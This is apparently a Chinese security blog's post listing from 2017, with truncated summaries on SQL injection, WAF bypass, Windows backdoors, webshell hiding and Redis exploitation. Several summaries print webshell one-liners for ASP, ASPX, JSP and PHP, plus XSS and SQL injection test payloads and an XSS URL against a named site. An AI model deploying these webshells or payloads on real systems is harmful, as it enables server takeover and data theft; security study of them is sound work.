摘要: 0X01 普通注入 SQL参数拼接,未做任何过滤 测试语句:id=1 UNION SELECT user(),2,3,4 from users 0x02 宽字节注入 A、MYSQL中的宽字符注入 示例代码: 测试语句:%df%27 mysql的特性,因为gbk是多字节编码,两个字节代表一个汉字,所以 阅读全文
posted @ 2017-11-01 11:12 Bypass 阅读(3597) 评论(0) 推荐(0) 编辑
摘要: http://fzbdfw.site/sqafgv/FL1W56/FF2DC6.html 域名防封检测 钓鱼案例:https://blog.csdn.net/weixin_44047795/article/details/102653570 伪装QQ红包&绕过URL检测:http://bobao.3 阅读全文
posted @ 2017-10-30 11:14 Bypass 阅读(711) 评论(0) 推荐(0) 编辑
摘要: 0x01 前言 之前发了一篇博客《Bypass D盾_IIS防火墙SQL注入防御(多姿势)》,D哥第一时间联系我,对问题进行修复。这段时间与D哥聊了挺多关于D盾这款产品的话题,实在是很佩服,对这样一款产品的细致以及投入。一个人,一款产品,一路走来,弥足艰辛。旧版D盾_防火墙支持win2003,新版D 阅读全文
posted @ 2017-10-28 11:06 Bypass 阅读(666) 评论(0) 推荐(0) 编辑
摘要: 0X00 前言 手机验证码在web应用中得到越来越多的应用,通常在用户登陆,用户注册,密码重置等业务模块用手机验证码进行身份验证。针对手机验证码可能存在的问题,收集了一些手机验证码漏洞的案例,这里做一个归纳总结,在测试中,让自己的思路更加明确。常见的手机验证码漏洞如下: 1、无效验证 2、客户端验证 阅读全文
posted @ 2017-10-26 14:45 Bypass 阅读(37835) 评论(2) 推荐(1) 编辑
摘要: 0x01 前言 在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。 这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。 Bypass思路:只考虑关键字被过滤如何进行Byp 阅读全文
posted @ 2017-10-24 14:39 Bypass 阅读(5831) 评论(0) 推荐(0) 编辑
摘要: WAF Bypass 综合篇: WAF攻防研究之四个层次Bypass WAF Bypass WAF Cookbook - MayIKissYou My Waf Bypass Series Article 从甲方的角度谈谈WAF测试方法 浅析Waf优缺点||硬件Waf、软件Waf、云Waf之总结 SQ 阅读全文
posted @ 2017-10-20 15:15 Bypass 阅读(535) 评论(0) 推荐(0) 编辑
摘要: 0x00 前言 未知攻焉知防,攻击者在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者如入无人之境。这里整理一些window服务端常见的后门技术,了解攻击者的常见后门技术,有助于更好去发现服务器安全问题。 常见的后门技术列表: 1、隐藏、克隆账户 2、shift后 阅读全文
posted @ 2017-10-20 14:25 Bypass 阅读(11168) 评论(0) 推荐(0) 编辑
摘要: Empire2.0,powershell后渗透利器的安装和试用 https://www.restkhz.com/2017/05/empire-test/ 使用Empire“探索”Windows个人电脑 http://www.freebuf.com/articles/system/133135.htm 阅读全文
posted @ 2017-10-12 23:59 Bypass 阅读(1031) 评论(0) 推荐(0) 编辑
摘要: 0x01 前言 在渗透测试过程中,弱口令检测是必要的一个环节,选择一个好用的弱口令扫描工具,尤为重要。 类似的弱口令检测工具如:Hydra、Hscan、X-Scan,很多时候满足不了自己的需求。 通过Python打造自己的弱口令扫描工具,集成在一起的Python脚本,在实战应用中,更切合实际。 0x 阅读全文
posted @ 2017-10-09 17:38 Bypass 阅读(7495) 评论(0) 推荐(1) 编辑
摘要: 今天看下群里在讨论Discuz!X 3.4 任意文件删除漏洞,自己做了一些测试,记录一下过程。结尾附上自己编写的python脚本,自动化实现任意文件删除。 具体漏洞,请查看 https://paper.seebug.org/411/ 0x01 环境搭建 到官网下载Discuz 3.4版本,phpst 阅读全文
posted @ 2017-10-01 00:05 Bypass 阅读(2698) 评论(1) 推荐(0) 编辑
摘要: 0X01 前言 未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell 关于ADS的介绍,就不再阐述,详见尾部参考资料。 PHP 一句话木马:<?php @ev 阅读全文
posted @ 2017-09-29 14:50 Bypass 阅读(2685) 评论(0) 推荐(0) 编辑
摘要: 0x01 环境搭建 启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了。 比如: 0x02 未授权访问漏洞测试 使用redis客户端直接无账号成功登录redis: 从登录的结果可以看出该redis服务对公网开放,且未启用认证。 利用redis写webshell 阅读全文
posted @ 2017-09-21 13:59 Bypass 阅读(8056) 评论(0) 推荐(1) 编辑
摘要: JSP一句话收集: 1、带密码的回显cmd马 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")) 阅读全文
posted @ 2017-09-21 10:23 Bypass 阅读(47060) 评论(1) 推荐(3) 编辑
摘要: aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque 阅读全文
posted @ 2017-09-21 09:18 Bypass 阅读(25425) 评论(0) 推荐(0) 编辑
摘要: ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Req 阅读全文
posted @ 2017-09-20 13:08 Bypass 阅读(45220) 评论(0) 推荐(0) 编辑
摘要: 珍藏版: 一个简单的过D盾的免杀php 过狗过D盾 参考链接:https://www.t00ls.net/thread-49715-1-1.html 阅读全文
posted @ 2017-09-20 09:35 Bypass 阅读(951) 评论(0) 推荐(0) 编辑
摘要: 代码审计精华文章收录: 关于php的一些'特性'或漏洞 https://github.com/80vul/phpcodz 【干货分享】PHP漏洞挖掘——进阶篇 http://blog.nsfocus.net/php-vulnerability-mining/ 常见高危漏洞及验证方法 http://b 阅读全文
posted @ 2017-09-19 19:51 Bypass 阅读(515) 评论(0) 推荐(0) 编辑
摘要: 0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+( 阅读全文
posted @ 2017-09-14 10:59 Bypass 阅读(8446) 评论(1) 推荐(0) 编辑
摘要: X-WAF 最近才关注到的一款云WAF,花了一些时间搭建了一个环境,并做了一些测试,感觉比较适合新手来练习WAF Bypass。 X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 官网:https://waf.xsec.io/ 源码:https:// 阅读全文
posted @ 2017-08-27 14:48 Bypass 阅读(1325) 评论(0) 推荐(0) 编辑
摘要: 扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程。 环境搭建: ActiveMQ 5.1.0 下载地址:http://activemq.apache.org/activemq-51 阅读全文
posted @ 2017-08-25 21:46 Bypass 阅读(4551) 评论(0) 推荐(0) 编辑
摘要: 0x01 前言 一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。 0x02 SQL注入工具 A、联合查询 union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思 阅读全文
posted @ 2017-08-03 15:20 Bypass 阅读(5247) 评论(0) 推荐(0) 编辑
摘要: 0x01 前言 在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。 0x02 环境搭建 Windows Server 2003+phpStudy sql注入点测试代码: sql.php 运行效果: 0x03 Bypass 过 阅读全文
posted @ 2017-08-03 11:15 Bypass 阅读(8853) 评论(2) 推荐(0) 编辑
摘要: 收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL <a href="javascript:alert('test')">link</a> <a href="java&#115;cript:alert('xss')">link</a> <a href 阅读全文
posted @ 2017-08-01 14:45 Bypass 阅读(11701) 评论(0) 推荐(2) 编辑
摘要: “真正”隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。 这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见 破解隐藏文件: 打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和 阅读全文
posted @ 2017-07-31 12:56 Bypass 阅读(1058) 评论(0) 推荐(0) 编辑
摘要: www.bsdxm.com/zeroclipboard/ZeroClipboard.swf?id=\"))}catch(e){alert(/xss/);}//&width=500&height=500 http://jykt.xmhcedu.gov.cn/uploadify/uploadify.sw 阅读全文
posted @ 2017-07-08 11:16 Bypass 阅读(1416) 评论(0) 推荐(0) 编辑
摘要: ngx_lua_waf ngx_lua_waf是一个基于lua-nginx-module(openresty)的web应用防火墙 源码:https://github.com/loveshell/ngx_lua_waf 安装部署 系统版本:Centos6.5 x86_64 1、openresty的配置 阅读全文
posted @ 2017-07-07 16:06 Bypass 阅读(681) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 无聊,测试了一下access特性 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和union之间的位置 ( 阅读全文
posted @ 2017-07-03 11:15 Bypass 阅读(718) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 探索玩了Mysql特性,继续来探索一下MSsql特性。 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和u 阅读全文
posted @ 2017-07-02 17:17 Bypass 阅读(1196) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 Mysql数据库特性探索,探索能够绕过WAF的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin 位置 阅读全文
posted @ 2017-07-02 17:15 Bypass 阅读(1048) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 oracle与mysql特性类似,半自动化fuzz了一下,记录成果。 0x02 测试 位置一:参数和union之间的位置 1)空白字符 Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20 2)注释符号/**/ 3)其他字符 %2e . 点号 阅读全文
posted @ 2017-07-01 10:03 Bypass 阅读(880) 评论(0) 推荐(0) 编辑